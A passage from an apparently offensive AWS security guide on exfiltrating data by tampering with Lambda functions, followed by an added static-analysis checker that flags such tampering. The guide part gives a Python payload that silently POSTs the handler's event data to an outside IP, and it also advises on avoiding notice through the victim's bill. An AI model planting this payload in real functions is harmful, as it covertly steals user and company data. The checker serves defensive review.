Data exfiltration

Data exfiltration will likely work much like the privilege escalation we performed previously: we will most likely edit an existing function and exfiltrate data from it. There are many different ways we could do this, some of which are listed here:

  • Modify an existing function and exfiltrate the data that it is receiving through the "event" and "context" parameters
  • Create a new function and associated trigger to respond to certain events in the AWS environment, such as in Chapter 11, Using Boto3 and Pacu to Maintain AWS Persistence, where we exfiltrated credentials every time a new user was created
  • Modify an existing function and place our exfiltration payload somewhere in the middle of the function to exfiltrate data that is gathered/modified during the function's normal execution

There are many other attack vectors here, as well; you just need to get creative.

If we just wanted our payload to exfiltrate the value passed to the "event" parameter, we could use a slightly modified version of the previous payload:

try:
    # Best-effort POST of the handler's event; any failure is silently ignored
    from botocore.vendored import requests
    requests.post('http://1.1.1.1', json=event, timeout=0.01)
except:
    pass

Make sure to be aware of the timeout specified for the Lambda function you are working with. You don't want your exfiltration to take so long that the Lambda function times out and fails altogether, so when you are exfiltrating large amounts of data through Lambda, it is best to either ensure the timeout is already set to a high value, or to go in and increase it yourself. The problem with that is that the target's Lambda bill will go up, because their functions are taking longer to complete than normal, which would draw attention to you.
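From the defender's side, the payload shape shown above (a network call that carries the handler's input, wrapped in a try/except that hides failures) can be found by static review of deployed function code. The following is an added example, not code from the book: the names find_event_exfil and SEND_METHODS, the list of method names and the sample source are all constructed for illustration.

```python
import ast
# Assumption: method names treated as "sends data over the network".
SEND_METHODS = {"post", "put", "patch", "get", "request", "urlopen", "sendall"}

def _names(node):
    """Bare identifiers referenced anywhere under an AST node."""
    return {n.id for n in ast.walk(node) if isinstance(n, ast.Name)}

def find_event_exfil(source):
    """Return sorted (line, method, silenced) for send-calls fed by handler input."""
    findings = set()
    for func in ast.walk(ast.parse(source)):
        if not isinstance(func, ast.FunctionDef):
            continue
        # Heuristic: the first two parameters are the handler's event/context.
        tainted = {a.arg for a in func.args.args[:2]}
        # One-hop propagation: variables assigned from tainted expressions.
        for node in ast.walk(func):
            if isinstance(node, ast.Assign) and _names(node.value) & tainted:
                for target in node.targets:
                    tainted |= _names(target)
        # Lines inside a try whose except handler does nothing but `pass`.
        silenced = set()
        for node in ast.walk(func):
            if isinstance(node, ast.Try) and any(
                    all(isinstance(s, ast.Pass) for s in h.body) for h in node.handlers):
                for stmt in node.body:
                    silenced |= {n.lineno for n in ast.walk(stmt) if hasattr(n, "lineno")}
        for node in ast.walk(func):
            if (isinstance(node, ast.Call) and isinstance(node.func, ast.Attribute)
                    and node.func.attr in SEND_METHODS):
                passed = set().union(*map(_names, node.args + [k.value for k in node.keywords]))
                if passed & tainted:
                    findings.add((node.lineno, node.func.attr, node.lineno in silenced))
    return sorted(findings)

# Constructed sample: one tampered handler, one benign handler (parsed, never run).
SAMPLE = '''
def lambda_handler(event, context):
    try:
        from botocore.vendored import requests
        requests.post('http://192.0.2.10', json=event, timeout=0.01)
    except:
        pass
    return {"statusCode": 200}
def health(event, context):
    requests.get("https://example.com/health", timeout=2)
    return event["id"]
'''
```

Only direct and one-hop data flow is tracked, so a hit is a prompt for manual review rather than proof; the silenced flag marks calls whose failures would never surface in the function's logs.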
